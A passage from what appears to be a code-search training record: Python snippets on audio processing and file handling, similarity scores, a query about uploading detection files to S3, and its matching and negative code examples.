file_name = %s\" % (file_name))\n continue\n\n dist_name = (\n os.path.join(\n dist_path,\n \"%s - %s\"\n % (tt.tag.artist.replace(\"/\", \" \"), tt.tag.title.replace(\"/\", \" \")),\n )\n + \".mp3\"\n )\n \n if KEEP_SOURCE == True:\n shutil.copyfile(os.path.join(file_path, file_name), dist_name)\n else:\n os.rename(os.path.join(file_path, file_name), dist_name)", "def load(self, path):\n (folder, filename) = os.path.split(path)\n (name, extension) = os.path.splitext(filename)\n return Sound(name, Waveform.load(path))", "def setup_by_filename(self, filename: str):\n self.filename = filename if filename is not None else \"tmp\"\n self.save_file = mcpython.common.world.SaveFile.SaveFile(self.filename)", "def trim_sample_section(file: str,\r\n sampling_rate: Union[float, int, str]) -> str:\r\n sampling_rate = float(sampling_rate)\r\n temp = temporary_copy(file)\r\n\r\n clip_length = int((duration(file) * sampling_rate * 0.01))\r\n start = random.randint(1, int(duration(file) - clip_length))\r\n end = start + clip_length\r\n trim_video(temp, file, start, end)\r\n return temp", "def noise(self, freq: int, /) -> None:", "def remux_audio(filename, title):\n dbg(\"starting remux\")\n temp_file = filename + \".\" + str(random.randint(10000, 99999))\n os.rename(filename, temp_file)\n meta = extract_metadata(title)\n metadata = [\"title=%s\" % meta[\"title\"]]\n\n if meta[\"artist\"]:\n metadata = [\"title=%s\" % meta[\"title\"], \"-metadata\",\n \"artist=%s\" % meta[\"artist\"]]\n\n cmd = [g.muxapp, \"-y\", \"-i\", temp_file, \"-acodec\", \"copy\", \"-metadata\"]\n cmd += metadata + [\"-vn\", filename]\n dbg(cmd)\n\n try:\n with open(os.devnull, \"w\") as devnull:\n subprocess.call(cmd, stdout=devnull, stderr=subprocess.STDOUT)\n\n except OSError:\n dbg(\"Failed to remux audio using %s\", g.muxapp)\n os.rename(temp_file, filename)\n\n else:\n os.unlink(temp_file)\n dbg(\"remuxed audio file using %s\" % g.muxapp)", "def sample_representation(mode, data, noise):\n\tif mode == \"orig_syn\":\n\t\tmodel.mode = \"synth\"\n\t\tz = model.sample_start(data)\n\telif mode == \"orig_nat\":\n\t\tmodel.mode = \"natural\"\n\t\tz = model.sample_start(data)\n\telse:\n\t\tmodel.mode = mode\n\t\tz = model.sample_start(data).add(noise)\n\tsample, cc = model.sample_end(z)\n\timg = sample.view(batch_size, 1, img_size, img_size)\n\tsave_image(img.cpu(), directory + \"/\" + \"random_\" + mode + \"_\" + str(epoch) + \".png\")\n\tsample_txt = open(directory + \"/random_\" + mode + \"_cc.txt\", \"a\")\n\tsample_txt.write(str(cc))\n\tsample_txt.close()", "def loadTestSong (filename):\n testSong = {}\n #information of analysed song stored in dictionary testSong\n testSong[\"spectrogram\"] = STFTsignal.getSTFTofFile(filename)\n testSong[\"name\"] = filename\n return testSong", "def signalroisample(filename,obs):\n from samplingdist import readworkspace,readfile\n #f,w,obsdict,modeldict,databkgdict,datasigdict = readworkspace(filename)\n f,obsdict,modeldict,databkgdict,datasigdict = readfile(filename)\n if not obsdict.has_key(obs):\n raise RuntimeError(\"Observable '%s' not defined\" % obs)\n sd = ObservableSamplingProb(obsdict[obs])\n sd.setupmodel('bkg','negative_binomial_pdf')\n sd.setupmodel('sig','negative_binomial_sum_pdf')\n\n datasig = datasigdict['dvsig_'+obs]\n databkg = databkgdict['dvbkg_'+obs]\n sd.fitTo(datasig,'sig')\n sd.fitTo(databkg,'bkg')\n\n samplename = filename.split('_')[1]\n sd.plot(samplename,datasig,'sig',sample=samplename+'_sig')\n sd.plot(samplename,databkg,'bkg',sample=samplename+'_bkg')\n\n nfile = filename.split('_')[1]+'_bkgsig_'+obs+'_ws.root'\n sd.update('w',nfile,[datasig,databkg])", "def random_line(filename):\n return random.choice(list(open(filename)))", "def load_audio_data(file_path, config):\n pure_path = pathlib.PurePath(file_path)\n audio_seg = pydub.AudioSegment.from_file(pure_path, pure_path.suffix[1:])\n if audio_seg.frame_rate != config.sample_rate_hertz:\n raise ValueError(\"Mismatch in sample rate: expected: %d; got: %d\" % (\n config.sample_rate_hertz, audio_seg.frame_rate))\n if audio_seg.channels != config.audio_channel_count:\n raise ValueError(\n \"Mismatch in audio channel count: expected: %d; got: %d\" % (\n config.audio_channel_count, audio_seg.channels))\n samples = list(audio_seg.get_array_of_samples())\n # NOTE(cais): We currently use LINEAR16 in the stream requests regardless of\n # the original audio file format. Is it possible to avoid converting FLAC to\n # LINEAR16 during these cloud requests?\n return struct.pack('<%dh' % len(samples), *samples)", "def save_to_file(filename: str, sequence: List[Sample]):\n\n with open(get_path() + \"/sequence/\" + filename, \"ab+\") as file:\n for sample in sequence:\n pickle.dump(sample, file, pickle.HIGHEST_PROTOCOL)", "def mp4_to_mp3(filepath):\n audio_clip = AudioFileClip(filepath)\n mp3_filename = filepath[:-3] + 'mp3'\n audio_clip.write_audiofile(mp3_filename)\n os.remove(filepath)\n audio_clip.close()", "def create_mixture_csv(data_type):\n \n workspace = config.workspace\n data_dir = config.data_dir\n speech_dir = os.path.join(data_dir,'{}_speech'.format(data_type))\n noise_dir = os.path.join(data_dir,'{}_noise'.format(data_type)) \n magnification = config.magnification\n fs = config.sample_rate\n \n speech_names = [na for na in os.listdir(speech_dir) if na.lower().endswith(\".wav\")]\n noise_names = [na for na in os.listdir(noise_dir) if na.lower().endswith(\".wav\")]\n \n rs = np.random.RandomState(0)\n out_csv_path = os.path.join(workspace, \"mixture_csvs\", \"%s.csv\" % data_type)\n create_folder(os.path.dirname(out_csv_path))\n \n cnt = 0\n f = open(out_csv_path, 'w')\n f.write(\"%s\\t%s\\t%s\\t%s\\n\" % (\"speech_name\", \"noise_name\", \"noise_onset\", \"noise_offset\"))\n for speech_na in speech_names:\n # Read speech. \n speech_path = os.path.join(speech_dir, speech_na)\n (speech_audio, _) = read_audio(speech_path)\n len_speech = len(speech_audio)\n \n # For training data, mix each speech with randomly picked #magnification noises. \n if data_type == 'train':\n selected_noise_names = rs.choice(noise_names, size=magnification, replace=False)\n # For test data, mix each speech with all noises. \n elif data_type == 'test':\n selected_noise_names = noise_names\n else:\n raise Exception(\"data_type must be train | test!\")\n\n # Mix one speech with different noises many times. \n for noise_na in selected_noise_names:\n noise_path = os.path.join(noise_dir, noise_na)\n (noise_audio, _) = read_audio(noise_path)\n \n len_noise = len(noise_audio)\n\n if len_noise <= len_speech:\n noise_onset = 0\n nosie_offset = len_speech\n # If noise longer than speech then randomly select a segment of noise. \n else:\n noise_onset = rs.randint(0, len_noise - len_speech, size=1)[0]\n nosie_offset = noise_onset + len_speech\n \n if cnt % 100 == 0:\n print(cnt)\n \n cnt += 1\n f.write(\"%s\\t%s\\t%d\\t%d\\n\" % (speech_na, noise_na, noise_onset, nosie_offset))\n f.close()\n print(out_csv_path)\n print(\"Create %s mixture csv finished!\" % data_type)", "def record_audio_to_file_and_get_wav(self, time, file_name):\n sample_width, frames = self.record_audio(time)\n wf = wave.open(file_name, 'wb')\n wf.setnchannels(self.channels)\n wf.setsampwidth(sample_width)\n wf.setframerate(self.rate)\n wf.writeframes(frames)\n wf.close()\n return WavFile(samples=frames, sample_width=sample_width, time=time, word=file_name)", "def get_resampled_filename(filepath):\n try:\n filepath = filepath.encode('utf-8')\n except UnicodeDecodeError:\n pass\n return 'tmp_%s.flac' % md5(filepath).hexdigest()", "def load_or_generate_data(self) -> None:\n x = np.linspace(0, 10, self.n_samples).reshape(-1, 1)\n y_sin = np.sin(x * 1.5)\n noise = np.random.randn(*x.shape)\n y = (y_sin + noise).reshape(x.shape[0], 1)\n self.x, self.y = x, y", "def random_text(random_file=None):\n if random_file is None:\n random_file = os.path.join(\n os.path.dirname(os.path.dirname(__file__)), \"data\", \"random.txt\"\n )\n with open(random_file) as file_used:\n return random.choice(list(file_used))", "def _create_wave_file(self):\n is_wave_open = False\n try:\n wv = wave.open(self.audio_file_name, mode='wb')\n is_wave_open = True\n wv.setparams((1, # 1 channel (mono)\n 2, # 2 bytes per sample * 1 channel\n self.sample_rate,\n 0, # Initial number of samples.\n 'NONE',\n 'not compressed'))\n wv.writeframes(self.sample_buffer)\n except:\n print('Error creating audio file')\n if is_wave_open:\n wv.close()", "def writeLowPlayers(self, filename):\n\n assert filename.endswith('.txt')\n file = open(filename, 'w')\n \n samples = []\n for player in self.players:\n if player.lowFps:\n for session in player.sessions:\n for sample in session.samples:\n sample.write(file)", "def update_filename(instance, filename):\n path = os.path.join(\"documents_analizer\", \"documents\")\n name = \"{}{}\".format(highly_random_name(),\n os.path.splitext(filename)[1])\n return os.path.join(path, name)", "def noisePreset() :\n s.noisePreset()", "def morse_to_audio(words, playsound=None, name_file=\"output\\\\code_to_audio_output.wav\"):\n dot = wave.open(\"kropka.wav\", 'rb')\n dash = wave.open(\"kreska.wav\", 'rb')\n\n rate_dot = dot.getframerate()\n\n rate_dash = dash.getframerate()\n\n data_dot = dot.readframes(-1)\n data_dash = dash.readframes(-1)\n data_dot = np.fromstring(data_dot, 'Int16')\n data_dash = np.fromstring(data_dash, 'Int16')\n\n l2=len(data_dot)\n l1=len(data_dash)\n\n output=[]\n\n for element in words:\n # print(element)\n for i in range(0, len(element)):\n # print(element[i])\n if element[i] == '1':\n # playsound(\"kropka.wav\")\n output.extend(data_dot)\n\n if element[i] == '0':\n # playsound(\"kreska.wav\")\n output.extend(data_dash)\n if element[i] == ' ':\n output.extend(np.zeros(int(len(data_dash)))*3)\n if i != len(element) - 1:\n # time.sleep(dl_kropka)\n output.extend(np.zeros(int(len(data_dot))))\n else:\n continue\n # time.sleep(dl_kreska)\n output.extend(np.zeros(int(len(data_dash))))\n\n # print(output)\n\n wynik=np.asarray(output)\n\n wynik=np.array(wynik).astype('int16')\n\n wav.write(name_file, rate_dash, wynik)\n\n #plik sie nie odtwarza w windowsie ale w audacity jest już wyraźnym szumem XD\n\n dot.close()\n dash.close()", "def seed_audio_file(dataset_id, data):\n\n for item in data:\n try:\n audiofile = AudioFile()\n audiofile.id_dataset = dataset_id\n audiofile.audio_path = item['file']\n audiofile.date_created = datetime.datetime.now()\n session.add(audiofile)\n session.commit()\n print(f'AudioFile: {audiofile.id} inserted')\n\n # get the data relative to the currenr audiofile\n items = [d for d in data if d['file'] == item['file']][0]\n\n # seed the peak table\n Seed.seed_peak(audiofile.id, items)\n\n # seed the rms table\n Seed.seed_rms(audiofile.id, items)\n\n except Exception as e:\n print(f'seed_audio_file: {e}')", "def make_audio(audio_path):\n content, sample_rate = librosa.load(audio_path, sr=16000)\n del sample_rate\n if content.dtype in (np.float32, np.float64):\n content = (content * np.iinfo(np.int16).max).astype(np.int16)\n return speech.RecognitionAudio(content=content.tobytes())", "def randomKeyFile(file_name):\n\twith open(file_name, \"w\") as kfile:\n\t\tkey = stringGen(256)\n\t\tkfile.write(key)\n\t\tkfile.close()" ]
[ "0.62971425", "0.6159043", "0.5984587", "0.59020734", "0.58086365", "0.5675305", "0.56475496", "0.5606833", "0.559785", "0.5565294", "0.54593736", "0.54581594", "0.5443855", "0.5441127", "0.54234785", "0.542045", "0.5408668", "0.53995633", "0.53893155", "0.5381253", "0.53792244", "0.53454196", "0.5334369", "0.53066516", "0.53053373", "0.52917856", "0.5278346", "0.5245606", "0.5235608", "0.5198715", "0.5172523", "0.5170907", "0.5165481", "0.515927", "0.51511306", "0.5143382", "0.51413226", "0.510828", "0.5080513", "0.507907", "0.50777304", "0.50756156", "0.507364", "0.5051668", "0.50516033", "0.50502545", "0.5050172", "0.5048073", "0.5044134", "0.50274694", "0.50087416", "0.5001905", "0.49991664", "0.49887535", "0.49851227", "0.4984924", "0.4981303", "0.49488008", "0.49478433", "0.49466366", "0.4941256", "0.49359694", "0.49318287", "0.49310616", "0.49252722", "0.49120787", "0.491068", "0.4909609", "0.4908085", "0.49076807", "0.49076396", "0.4907196", "0.49068382", "0.49059916", "0.48888698", "0.48825243", "0.48803186", "0.4870158", "0.48668113", "0.4865984", "0.48625466", "0.48601547", "0.48594904", "0.48438197", "0.48430237", "0.48416346", "0.48415843", "0.48279777", "0.4825472", "0.48231688", "0.48231626", "0.4821127", "0.4819153", "0.4816528", "0.48093918", "0.48011687", "0.4785375", "0.4783096", "0.47826692", "0.47813097" ]
0.689111
0
Upload a file to S3 or move to another directory. INPUT_DIR is the name of the directory with parquets. DETECTIONS_DIR can be a
def upload_file( input_dir, output_dir, partition, node_id, job_id, pattern, file_format ): logging.basicConfig( level=logging.INFO, format="%(asctime)s %(levelname)s %(name)s.%(funcName)s: %(message)s", datefmt="%Y-%m-%d %H:%M:%S", ) logging.info(f"Job: {job_id} | Node: {node_id} | Partition {partition}") filename = f"{pattern}_{partition}.{file_format}" file_path = os.path.join(input_dir, filename) output_path = os.path.join(output_dir, filename) logging.info(f"Opening detection file: {file_path}") data = iodf.read_file(file_path) logging.info(f"Writing output in {output_path}") iodf.write_file(data, output_path, file_format=file_format) logging.info(f"Finish him!") return
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def upload_data(dir, input_dir, s3_dir):\n config = _read_config(dir)\n sage_maker_client = sagemaker.SageMakerClient(config.aws_profile, config.aws_region)\n\n return sage_maker_client.upload_data(input_dir, s3_dir)", "def upload_file_to_s3(bucket_name, input_filepath, output_filename):\n s3 = boto3.client(\"s3\")\n with open(input_filepath, \"rb\") as f:\n s3.upload_fileobj(f, bucket_name, output_filename)", "def upload_to_s3(bucket_name, sourceDir):\n try:\n client = boto3.client('s3')\n resource = boto3.resource('s3')\n except ClientError as err:\n print(\"Failed to create boto3 client.\\n\" + str(err))\n return False\n try:\n # clean the bucket\n bucket = resource.Bucket(bucket_name)\n for key in bucket.objects.all():\n key.delete()\n\n # upload the new files\n uploadFileNames = getFiles(sourceDir)\n print(\"Found \" + len(uploadFileNames).__str__() + ' files')\n\n for filename in uploadFileNames:\n destName = os.path.join(*(filename.split('/')[1:]))\n print(\"Uploading file \" + filename + ' to ' + destName)\n resource.Object(bucket_name, destName).put(Body=open(filename, 'rb'),\n ContentType=get_contenttype_from_filename(filename))\n\n except ClientError as err:\n print(\"Failed to upload artefact to S3.\\n\" + str(err))\n return False\n except IOError as err:\n print(\"Failed to access artefact in this directory.\\n\" + str(err))\n return False\n\n return True", "def upload_to_s3(file_from_machine, bucket, file_to_s3):\n s3.upload_file(file_from_machine, bucket, file_to_s3)\n print(file_to_s3, \" : is upoaded to s3\")", "def upload_files_to_S3(sourceDir, bucket_name, destDir, aws_access_key_id=None, aws_secret_access_key=None):\n\n # set up the connection to the AWS Bucket.\n if aws_access_key_id == None or aws_secret_access_key == None:\n client = boto3.client(service_name='s3', aws_access_key_id=None, aws_secret_access_key=None)\n else:\n client = boto3.client(service_name='s3', aws_access_key_id=aws_access_key_id,\n aws_secret_access_key=aws_secret_access_key)\n transfer = boto3.s3.transfer.S3Transfer(client)\n\n # Get a list of all the files that have already been uploaded to S3\n MyS3Objects = [s.key for s in boto3.resource('s3').Bucket(bucket_name).objects.filter(Prefix=destDir)]\n\n\n\n\n uploadFileNames = files_to_upload(sourceDir)\n\n #print(sourceDir)\n #print(uploadFileNames)\n\n\n UploadCounter = 0\n\n for filename in uploadFileNames:\n sourcepath = filename[0]\n destpath = destDir + '/' + filename[1]\n\n # If the file is already on S3, don't upload it again\n if destpath in MyS3Objects:\n print(destpath, \" is already on S3\")\n continue\n\n UploadCounter += 1\n if UploadCounter % 100 == 0: print(\"Files Uploaded:\", UploadCounter)\n\n # print ('Uploading %s to Amazon S3 bucket %s' % (sourcepath, bucket_name))\n\n transfer.upload_file(sourcepath, bucket_name, destpath)\n\n print(\"All the files have been uploaded!\")", "def upload_images_to_s3(directory):\n for f in directory.iterdir():\n if str(f).endswith(('.png', '.jpg', '.jpeg')):\n full_file_path = str(f.parent) + \"/\" + str(f.name)\n file_name = str(f.name)\n s3_client.upload_file(full_file_path, BASE_BUCKET, file_name)\n print(f,\"put\")", "def upload_file(self, file_path, file_name, output_path):", "def _upload_s3(self, filename, bucket, objectKey):\n return s3_client.upload_file(filename, bucket, objectKey)", "def upload_bam(bam_s3_path, local_folder_path):\n\n upload_folder(bam_s3_path, local_folder_path)", "def test_put_file(self):\n self.prepare_uploads()\n backend = BackendS3(**self.config)\n uploads = self.upload_path\n src = os.path.join(uploads, 'demo-test.tar.gz')\n id = utils.generate_id('demo-test.tar.gz')\n backend.put(src, id)\n path = '/'.join(backend.id_to_path(id)) + '/demo-test.tar.gz'\n self.assertTrue(backend.exists(path))", "def upload_file(local_path, s3_path):\n with open(local_path, 'rb') as binary_data:\n s3.Bucket(bucket_name).put_object(Key=s3_path, Body=binary_data)", "def project_uploader():\n if not current_app.config['S3_KEY']:\n return ''\n if len(request.files) == 0:\n return 'No files selected'\n img = request.files['file']\n if not img or img.filename == '':\n return 'No filename'\n ext = img.filename.split('.')[-1].lower()\n if ext not in ACCEPTED_TYPES:\n return 'Invalid format (allowed: %s)' % ','.join(ACCEPTED_TYPES)\n # generate a simpler filename\n keepcharacters = ('.', '_')\n safe_filename = img.filename.replace(' ', '_')\n safe_filename = \"\".join(\n c for c in safe_filename\n if c.isalnum() or c in keepcharacters).rstrip()\n if not safe_filename:\n safe_filename = \"\".join(random_password(8), '.', ext)\n # use random subfolder inside user id folder\n filename = '/'.join([\n str(current_user.id),\n random_password(24),\n safe_filename\n ])\n # with tempfile.TemporaryDirectory() as tmpdir:\n # img.save(path.join(tmpdir, filename))\n if 'S3_FOLDER' in current_app.config:\n s3_filepath = '/'.join([current_app.config['S3_FOLDER'], filename])\n else:\n s3_filepath = filename\n # print('Uploading to %s' % s3_filepath)\n if 'S3_ENDPOINT' in current_app.config:\n s3_obj = boto3.client(\n service_name='s3',\n endpoint_url=current_app.config['S3_ENDPOINT'],\n aws_access_key_id=current_app.config['S3_KEY'],\n aws_secret_access_key=current_app.config['S3_SECRET'],\n )\n #print('Uploading to endpoint %s' % current_app.config['S3_ENDPOINT'])\n else:\n s3_obj = boto3.client(\n service_name='s3',\n region_name=current_app.config['S3_REGION'],\n aws_access_key_id=current_app.config['S3_KEY'],\n aws_secret_access_key=current_app.config['S3_SECRET'],\n )\n #print('Uploading to region %s' % current_app.config['S3_REGION'])\n # Commence upload\n s3_obj.upload_fileobj(img,\n current_app.config['S3_BUCKET'],\n s3_filepath,\n ExtraArgs={'ContentType': img.content_type,\n 'ACL': 'public-read'}\n )\n return escape('/'.join([current_app.config['S3_HTTPS'], s3_filepath]))", "def upload_file(file_name, s3_key):\n # Upload the file\n s3_connection = boto.connect_s3(aws_access_key_id, aws_secret_access_key)\n bucket = s3_connection.get_bucket(predator_bucket_name)\n try:\n key = boto.s3.key.Key(bucket, s3_key)\n key.set_contents_from_filename(file_name)\n except ClientError as e:\n logging.error(e)\n return False\n return True", "def store_to_s3():\n\n try:\n # establish aws/s3 connection\n s3 = boto3.client('s3',\n aws_access_key_id=ACCESS_KEY,\n aws_secret_access_key=SECRET_KEY\n )\n logger.info(\"S3 connection established!\")\n except Exception as e:\n logger.error('Fail to connect to aws s3. Please check your credentials!')\n logger.error(e)\n else:\n try:\n # upload local file to S3 bucket\n logger.info(\"Uploading {} to {} bucket as {}\".format(config.Local_File_To_Upload,\n config.Bucket_Name,\n config.S3_Filename))\n s3.upload_file(config.Local_File_To_Upload,\n config.Bucket_Name,\n config.S3_Filename)\n logger.info('File successfully uploaded to S3 bucket!')\n except FileNotFoundError:\n logger.error('File not found, pleas check the file path.')\n except Exception as e:\n logger.error(e)", "def upload_file(s3_client, file_name, object_name=None):\n\n # read bucket name from cfg file\n bucket = config.get('S3', 'LANDING_ZONE')\n\n # If S3 object_name was not specified, use file_name\n if object_name is None:\n object_name = file_name.split('\\\\')[-1]\n\n # Upload the file\n try:\n response = s3_client.upload_file(file_name, bucket, object_name, Callback=ProgressPercentage(file_name))\n# logger.debug(f\"Got response from s3 client for uploading file: {response}\")\n except Exception as e:\n logger.error(f\"Error occurred while upload {file_name} : {e}\")\n return False\n return True", "def upload(file_path, aws_path, access_key, secret_key) -> None:\n # bucket = \"dev-com-courtlistener-storage\"\n bucket = \"seals.free.law\"\n client = boto3.client(\n \"s3\",\n aws_access_key_id=access_key,\n aws_secret_access_key=secret_key,\n )\n transfer = S3Transfer(client)\n if \".png\" in file_path:\n content_type = \"image/png\"\n else:\n content_type = \"image/svg+xml\"\n transfer.upload_file(\n file_path,\n bucket,\n aws_path,\n extra_args={\"ContentType\": content_type, \"ACL\": \"public-read\"},\n )\n print(f\"http://{bucket}.s3-us-west-2.amazonaws.com/{aws_path}\")", "def upload_to_s3():\n\n # get the json password file\n pwd_file = open(PWD_FILE, mode='rb')\n pwd_list = json.load(pwd_file) # calls read() on file object\n\n # only upload if json password file not empty\n if len(pwd_list) > 0:\n # reset file object to beginning\n pwd_file.seek(0)\n\n # setup s3 connection\n s3 = boto3.resource('s3', region_name=Config.connection['region_name'],\n aws_access_key_id=Config.connection['aws_access_key'],\n aws_secret_access_key=Config.connection['aws_secret_key'])\n\n s3_object_path = Config.s3['key_prefix'] + PWD_FILE\n s3.Bucket(Config.s3['bucket_name']).put_object(Key=s3_object_path, Body=pwd_file)", "def upload(filename, bucket):\n print(\"Uploading {} to S3\".format(filename.lower().replace('_', '-')))\n url = \"https://s3.ca-central-1.amazonaws.com/{}/{}\".format(bucket,\n filename.lower().replace('_', '-'))\n with open('{}/{}'.format(WORK_DIR, filename), 'rb') as data:\n requests.put(url, data=data)", "def test_put_file_variant(self):\n self.prepare_uploads()\n backend = BackendS3(**self.config)\n uploads = self.upload_path\n src = os.path.join(uploads, 'demo-test.tar.gz')\n id = utils.generate_id('demo-test.tar.gz')\n backend.put_variant(src, id, 'variant.tar.gz')\n path = '/'.join(backend.id_to_path(id)) + '/variant.tar.gz'\n self.assertTrue(backend.exists(path))", "def upload_file_to_s3(local_path: Path, s3_path: Path, overwrite: bool = False) -> None:\n import warnings\n\n warnings.filterwarnings(\n action=\"ignore\", message=\"unclosed\", category=ResourceWarning\n )\n\n s3_args, unknown = get_s3_args().parse_known_args()\n s3_client = get_s3_client(s3_args)\n log = get_logger(\"upload_file_to_s3\")\n\n try:\n # only write files to s3 that don't already exist unless overwrite is passed\n if s3_object_exists(s3_path) and not overwrite:\n log.debug(\n f\"s3://{s3_args.s3_bucket}/{s3_path} already exists in s3, not overwriting\"\n )\n return\n\n s3_client.put_object(\n Body=local_path.read_bytes(), Bucket=s3_args.s3_bucket, Key=str(s3_path)\n )\n log.debug(f\"uploaded s3://{s3_args.s3_bucket}/{s3_path}\")\n\n except s3_client.exceptions.ClientError as exc:\n # catch and raise any errors generated while attempting to communicate with s3\n s3_client_attributes = {\n attr: getattr(s3_client, attr) for attr in s3_client.__dict__.keys()\n }\n s3_client_attributes.update(\n {\"bucket\": s3_args.s3_bucket, \"object_path\": s3_path,}\n )\n raise S3Error(f\"{s3_client_attributes} S3 ClientError\") from exc", "def s3_sync(s3_bucket, s3_prefix, sync_path=\".\"):\n # Get bucket\n s3_resource = boto3.resource(\"s3\")\n bucket = s3_resource.Bucket(s3_bucket)\n\n # Walk paths and subdirectories, uploading files\n for path, subdirs, files in os.walk(sync_path):\n # Get relative path prefix\n relpath = os.path.relpath(path, sync_path)\n if not relpath.startswith('.'):\n prefix = os.path.join(s3_prefix, relpath)\n else:\n prefix = s3_prefix\n\n for file in files:\n file_key = os.path.join(prefix, file)\n bucket.upload_file(os.path.join(path, file), file_key)", "def upload_files(self, source_file_name, destination_blob_name):\n blob = self.bucket.blob(destination_blob_name)\n blob.upload_from_filename(source_file_name)\n\n print(\n \"File {} uploaded to {} in {} bucket.\".format(\n source_file_name, destination_blob_name, self.bucket\n )\n )", "def upload_file_to_bucket(s3_client, file_obj, bucket, folder, object_name=None):\n # If S3 object_name was not specified, use file_name\n if object_name is None:\n object_name = file_obj\n\n # Upload the file\n try:\n response = s3_client.upload_fileobj(file_obj, bucket, f\"{folder}/{object_name}\")\n print(response)\n except ClientError:\n return False\n return True", "def put_upload(self):\n # print \"starting upload...\", self.current_upload['filepath']\n self.touch()\n self.log(\"STARTING_UPLOAD\", level=INFO)\n try:\n Backend.put_file(self.fileobj, self.current_upload[\"gcs_url\"])\n except exceptions.FilePutError as err:\n self.handle_put_error(err, self.fileobj)\n raise", "def upload_json_to_s3(directory):\n for f in directory.iterdir():\n if str(f).endswith('.json'):\n full_file_path = str(f.parent) + \"/\" + str(f.name)\n file_name = str(f.name)\n s3_client.upload_file(full_file_path, BASE_BUCKET, file_name)", "def upload(iid, file_obj, content_type):\n if AWS_CLIENT_CONFIG and BUCKET_NAME:\n try:\n s3 = boto3.resource('s3', **AWS_CLIENT_CONFIG)\n s3.Bucket(BUCKET_NAME).put_object(Key=iid,\n Body=file_obj,\n ContentType=content_type)\n return StorageType.S3\n except botocore.exceptions.ClientError as e:\n logger.error(e)\n else:\n # store locally in temp dir (tests, local development)\n store_temp_file(iid, file_obj)\n return StorageType.TMP\n return None", "def upload_chain(s3_path, local_path, bucket_name='lwr-inverse-us-east'):\n s3 = boto3.resource(\"s3\")\n lwr_AIES = s3.Bucket(bucket_name)\n file_content = open(local_path, 'rb')\n lwr_AIES.put_object(Key=s3_path, Body=file_content)", "def upload_to_aws(local_file, bucket, s3_file, access_key, secret_key):\n s3 = boto3.client('s3', aws_access_key_id=access_key,\n aws_secret_access_key=secret_key)\n \n try:\n s3.upload_file(local_file, bucket, s3_file)\n print(f'Upload of {local_file} to {bucket} as {s3_file} successful.')\n return True\n except FileNotFoundError:\n print(f'File {local_file} not found.')\n return False\n except NoCredentialsError:\n print('Credentials invalid or not available.')\n return False", "def upload_object(self, file_path, s3_path):\n logging.info(\"Uploading file to \\\"{}\\\" to S3\".format(s3_path))\n bucket_name, key = S3Util.get_bucket_and_key(s3_path)\n self.s3_resource.Bucket(bucket_name).upload_file(file_path, key)", "def upload_to_s3(site, bucket, directory=None, files=None, prefix=None):\n if bucket is None:\n print red('Error: Bucket must be specified.')\n return\n if directory is None and files is None:\n print red('Error: Directory and/or files must be specified.')\n return\n # Setup boto\n import boto\n from boto.s3.bucket import Bucket\n from boto.s3.key import Key\n import mimetypes\n import fnmatch\n\n setup_aws_access_key(site)\n\n # Connect to S3\n c = boto.connect_s3()\n b = Bucket(c, bucket)\n\n # Fix the prefix\n # prefix itself shouldn't have a / prefix itself but should end with /\n if prefix:\n prefix = prefix.lstrip('/')\n if prefix and not prefix.endswith('/'):\n prefix = prefix + '/'\n\n def __upload(key, filename):\n k = Key(b)\n k.key = key\n headers = {}\n content_type = mimetypes.guess_type(filename)[0]\n if site.has_key('webapp') and site['webapp'].get('cache_control'):\n for pattern in site['webapp']['cache_control']:\n if fnmatch.fnmatch(filename, pattern):\n headers['Cache-Control'] = site['webapp']['cache_control'][pattern]\n break\n if site.has_key('webapp') and site['webapp'].get('gzip_types') and content_type in site['webapp']['gzip_types']:\n from gzip import GzipFile\n from StringIO import StringIO\n # Need to specify content_type when uploading from a string!\n headers['Content-Type'] = content_type\n headers['Content-Encoding'] = 'gzip'\n s = StringIO()\n g = GzipFile(fileobj=s, mode='wb')\n with open(filename, 'rb') as f:\n g.write(f.read())\n g.close()\n k.set_contents_from_string(s.getvalue(), headers)\n else:\n k.set_contents_from_filename(filename, headers)\n\n if files:\n # Upload individual files\n if directory:\n keys = [filename.lstrip('/') for filename in files]\n files = [os.path.join(directory, filename) for filename in files]\n else:\n keys = [os.path.split(filename)[1] for filename in files]\n for i, filename in enumerate(files):\n print 'Uploading %s' % keys[i]\n if prefix:\n key = prefix + keys[i]\n else:\n key = keys[i]\n __upload(key, filename)\n elif directory:\n # Upload an entire directory\n def __upload_dir(arg, dirname, names):\n # arg is the starting directory\n for name in names:\n filename = os.path.join(dirname, name)\n if not os.path.isdir(filename) and not os.path.islink(filename) and not name.startswith('.'):\n key = filename[len(arg):]\n if key.startswith('/'):\n key = key[1:]\n if prefix:\n key = prefix + key\n print 'Uploading %s' % key\n __upload(key, filename)\n os.path.walk(directory, __upload_dir, directory)", "def UploadSource(source_dir, target_object):\n dockerignore = os.path.join(source_dir, '.dockerignore')\n exclude = None\n if os.path.exists(dockerignore):\n with open(dockerignore) as f:\n # Read the exclusions, filtering out blank lines.\n exclude = set(filter(bool, f.read().splitlines()))\n # Remove paths that shouldn't be excluded on the client.\n exclude -= set(BLACKLISTED_DOCKERIGNORE_PATHS)\n with tempfile.NamedTemporaryFile() as f:\n # We are able to leverage the source archiving code from docker-py;\n # however, there are two wrinkles:\n # 1) The 3P code doesn't support gzip (it's expecting a local unix socket).\n # So we create a GzipFile object and let the 3P code write into that.\n # 2) The .seek(0) call at the end of the 3P code causes GzipFile to throw an\n # exception. So we use GzipFileIgnoreSeek as a workaround.\n with _GzipFileIgnoreSeek(mode='wb', fileobj=f) as gz:\n docker.utils.tar(source_dir, exclude, fileobj=gz)\n f.seek(0)\n cloud_storage.Copy(f.name, target_object)", "def upload_to_s3(file_path, config):\n logging.info(\"Uploading file to S3 bucket: %s\", config['s3_bucket_name'])\n s3 = boto3.resource('s3')\n s3_filename = config['s3_bucket_path'] + config['rendered_filename']\n s3.Bucket(config['s3_bucket_name']).upload_file(\n file_path, s3_filename, ExtraArgs={\n 'ContentType': 'text/html', 'ACL': 'public-read'})", "def upload_file(file, bucket_path, bucket=S3_BUCKET):\n # Bucket path should be somedir/name_of_file.ext\n try:\n if isinstance(file, str):\n resource.upload_file(file, bucket, bucket_path)\n else:\n resource.upload_fileobj(file, bucket, bucket_path)\n except:\n raise ChildProcessError('Something broke, Cap\\'n')", "def upload_folder_to_s3(folder_path, s3_uri, connection=None):\n\n if connection:\n run_out = connection.run(f\"aws s3 cp --recursive {folder_path}/ {s3_uri}/\")\n else:\n run_out = run(f\"aws s3 cp --recursive {folder_path}/ {s3_uri}/\")\n\n return run_out.return_code", "def _upload_to_s3(s3_uploader, 